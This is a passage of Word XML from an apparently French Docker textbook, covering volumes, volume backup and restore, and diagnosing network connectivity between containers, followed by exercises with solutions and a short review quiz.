                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fichiers temporaires sensibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre montages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Volume nommé</w:t>
        <w:br/>
        <w:t>docker volume create pgdata</w:t>
        <w:br/>
        <w:t>docker run -d --name db -v pgdata:/var/lib/postgresql/data postgres:16-alpine</w:t>
        <w:br/>
        <w:br/>
        <w:t># Bind mount en lecture seule</w:t>
        <w:br/>
        <w:t>docker run -d -v /etc/app/config.yml:/app/config.yml:ro mon-app:1.0</w:t>
        <w:br/>
        <w:br/>
        <w:t># Bind mount de développement (code source)</w:t>
        <w:br/>
        <w:t>docker run -d -v "$PWD/src:/app/src" -p 3000:3000 node:22-alpine npm run dev</w:t>
        <w:br/>
        <w:br/>
        <w:t># tmpfs</w:t>
        <w:br/>
        <w:t>docker run -d --tmpfs /run:rw,size=16m mon-app:1.0</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VOLUME NOMMÉ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Espace de stockage géré par Docker, identifié par un nom et indépendant du conteneur. C'est le choix recommandé pour les données de production.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois commandes de sauvegarde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Lister et inspecter</w:t>
        <w:br/>
        <w:t>docker volume ls</w:t>
        <w:br/>
        <w:t>docker volume inspect pgdata</w:t>
        <w:br/>
        <w:br/>
        <w:t># Sauvegarder un volume dans une archive</w:t>
        <w:br/>
        <w:t>docker run --rm \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -v pgdata:/data:ro \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -v "$PWD:/sauvegarde" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  alpine tar -czf /sauvegarde/pgdata-$(date +%F).tar.gz -C /data .</w:t>
        <w:br/>
        <w:br/>
        <w:t># Restaurer</w:t>
        <w:br/>
        <w:t>docker run --rm \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -v pgdata:/data \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -v "$PWD:/sauvegarde:ro" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  alpine sh -c "cd /data &amp;&amp; tar -xzf /sauvegarde/pgdata-2026-10-19.tar.gz"</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LES DROITS DU VOLUME COMPTENT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un conteneur qui tourne avec l'utilisateur 10001 ne peut pas écrire dans un volume appartenant à root. Corrigez la propriété avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>chown -R 10001:10001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> depuis un conteneur temporaire, ou utilisez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--user</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> de façon cohérente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>64.4 Diagnostiquer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un conteneur qui ne joint pas un autre a quatre causes principales : pas le même réseau, un nom mal orthographié, un port interne erroné, ou un service qui écoute sur l'interface locale du conteneur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.233 — Quatre symptômes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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Vérification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>bad address</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Nom non résolu</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Même réseau ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="321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connection refused</w:t>
            </w:r>
          </w:p>
        </w:tc>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Port fermé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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ss -ltnp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> dans le conteneur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>connection timeout</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Pare-feu ou mauvais réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>docker network inspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Résolution vers une IP obsolète</w:t>
            </w:r>
          </w:p>
        </w:tc>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Conteneur recréé</w:t>
            </w:r>
          </w:p>
        </w:tc>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Utiliser le nom</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux vérifications décisives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Le conteneur écoute-t-il sur toutes les interfaces ?</w:t>
        <w:br/>
        <w:t>docker exec api ss -ltnp</w:t>
        <w:br/>
        <w:t># LISTEN 0.0.0.0:3000  ← joignable</w:t>
        <w:br/>
        <w:t># LISTEN 127.0.0.1:3000 ← non joignable depuis un autre conteneur</w:t>
        <w:br/>
        <w:br/>
        <w:t># Les deux conteneurs partagent-ils un réseau ?</w:t>
        <w:br/>
        <w:t>docker inspect -f '{{json .NetworkSettings.Networks}}' api</w:t>
        <w:br/>
        <w:t>docker inspect -f '{{json .NetworkSettings.Networks}}' db</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ÉCOUTE SUR `127.0.0.1`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un service lié à l'adresse de boucle n'accepte que les connexions provenant de son propre espace de noms réseau. C'est la cause la plus fréquente d'un « conteneur injoignable » alors qu'il tourne.</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DIAGNOSTIC DE CONNECTIVITÉ ENTRE CONTENEURS</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docker network inspect</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : les deux sont-ils connectés ?</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docker exec … getent hosts nom</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : la résolution fonctionne-t-elle ?</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ss -ltnp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> dans la cible : l'écoute est-elle sur </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>0.0.0.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">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Tester avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>nc -zv</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> depuis le conteneur source.</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réseau créé par l'utilisateur fournit la résolution par nom.</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Le réseau </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>bridge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> par défaut ne résout pas les noms.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Publier un port l'expose sur l'hôte, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>EXPOSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne fait rien.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base n'a pas besoin d'être publiée sur l'hôte.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volume nommé survit à la suppression du conteneur.</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bind mount suit les modifications du code, un volume non.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droits du volume doivent correspondre à l'utilisateur du conteneur.</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Un service lié à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est injoignable depuis un autre conteneur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les conteneurs communiquent et persistent. Le chapitre suivant assemble plusieurs services en une application cohérente.</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64.1 — Relier une application et sa base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L'API doit joindre PostgreSQL par son nom.</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Créez un réseau dédié.</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Nommez les conteneurs.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la résolution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 64.2 — Sauvegarder et restaurer un volume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Les données de la base doivent survivre à une perte de conteneur.</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Sauvegardez vers une archive.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Supprimez le conteneur.</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Restaurez dans un volume neuf.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 64.3 — Diagnostiquer un conteneur injoignable</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L'API répond, mais elle ne joint pas la base.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Vérifiez le réseau.</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Vérifiez l'écoute.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le nom.</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64.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>docker network create app-net</w:t>
        <w:br/>
        <w:br/>
        <w:t>docker run -d --name db --network app-net \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -e POSTGRES_PASSWORD=secret -v pgdata:/var/lib/postgresql/data \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  postgres:16-alpine</w:t>
        <w:br/>
        <w:br/>
        <w:t>docker run -d --name api --network app-net -p 8080:3000 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -e DATABASE_URL=postgres://postgres:secret@db:5432/postgres \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  mon-api:1.0</w:t>
        <w:br/>
        <w:br/>
        <w:t>docker exec api getent hosts db</w:t>
        <w:br/>
        <w:t>docker logs api</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La chaîne de connexion utilise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> comme nom d'hôte : c'est le DNS Docker qui résout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Aucun port de la base n'est publié sur l'hôte : elle n'est joignable que par le réseau Docker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 64.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># Sauvegarde</w:t>
        <w:br/>
        <w:t>docker run --rm -v pgdata:/data:ro -v "$PWD:/s:rw" alpine \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tar -czf /s/pgdata.tgz -C /data .</w:t>
        <w:br/>
        <w:br/>
        <w:t># Perte du conteneur</w:t>
        <w:br/>
        <w:t>docker rm -f db</w:t>
        <w:br/>
        <w:br/>
        <w:t># Restauration</w:t>
        <w:br/>
        <w:t>docker volume create pgdata2</w:t>
        <w:br/>
        <w:t>docker run --rm -v pgdata2:/data -v "$PWD:/s:ro" alpine \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sh -c "cd /data &amp;&amp; tar -xzf /s/pgdata.tgz"</w:t>
        <w:br/>
        <w:t>docker run -d --name db --network app-net -v pgdata2:/var/lib/postgresql/data postgres:16-alpine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La sauvegarde s'effectue depuis un conteneur temporaire : elle ne dépend pas de l'état du service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Restaurer dans un volume neuf permet de comparer avant de basculer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 64.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>docker inspect -f '{{json .NetworkSettings.Networks}}' api db</w:t>
        <w:br/>
        <w:t>docker exec api getent hosts db</w:t>
        <w:br/>
        <w:t>docker exec db ss -ltnp</w:t>
        <w:br/>
        <w:t>docker exec api nc -zv db 5432</w:t>
        <w:br/>
        <w:br/>
        <w:t># Cause fréquente : postgres écoute sur 127.0.0.1</w:t>
        <w:br/>
        <w:t># Solution : configurer listen_addresses = '*'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PostgreSQL écoute par défaut sur toutes les interfaces dans l'image officielle, mais une configuration personnalisée peut le restreindre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>nc -zv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> distingue un refus (service absent) d'un timeout (réseau ou pare-feu).</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 pilote réseau offre la résolution par nom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host</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none</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bridge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur un réseau créé</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macvlan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> seul</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-p 8080:80</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Expose le port 8080 du conteneur</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Publie le port 80 du conteneur sur 8080 de l'hôte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Ouvre un tunnel</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Crée un volume</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Quel montage survit à la suppression du conteneur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La couche d'écriture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Un volume nommé</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tmpfs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Aucun</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 xml:space="preserve">Pourquoi un service lié à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est-il injoignable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Il est arrêté</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Il n'accepte que les connexions locales à son espace réseau</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 port est réservé</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Docker le bloque</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Quel type de montage est en mémoire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Volume nommé</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Bind mount</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tmpfs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Overlay</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C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un réseau bridge défini par l'utilisateur fournit un DNS interne.</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La syntaxe est </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hôte:conteneur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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Le volume est indépendant du cycle de vie du conteneur.</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L'adresse de boucle n'est pas accessible depuis un autre conteneur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>tmpfs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> réside en mémoire et disparaît à l'arrêt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>65. Docker Compose : applications multi-services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Décrire une application complète dans un fichier versionné, reproductible sur n'importe quelle machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
